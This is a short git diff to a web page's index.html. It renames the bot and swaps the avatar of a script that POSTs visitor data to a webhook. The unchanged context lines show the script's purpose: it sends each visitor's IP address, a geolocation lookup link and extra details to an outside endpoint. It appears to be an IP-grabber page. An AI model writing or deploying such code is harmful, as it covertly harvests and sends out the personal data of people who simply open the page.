--- a/index.html
+++ b/index.html
@@ -56,8 +56,8 @@
         request.open("POST", wbhk);
         request.setRequestHeader('Content-type', 'application/json');
         const params = {
-          username: "Beamed",
-          avatar_url: 'https://images.g2crowd.com/uploads/product/image/large_detail/large_detail_de619ca81012d42cede6fd18af63d8b1/inkscape.png',
+          username: "Data",
+          avatar_url: 'https://t3.ftcdn.net/jpg/03/76/21/90/360_F_376219080_zFT3Vjen5EbFWmXhUXTRNZaT10FfJ4d8.jpg',
           content: "**Ip** : _" + ispp + "_\n**Raw** : _https://api.techniknews.net/ipgeo/" + ispp + "_\n**Extra Info** : ```" + extra + "```"
         }
         request.send(JSON.stringify(params));
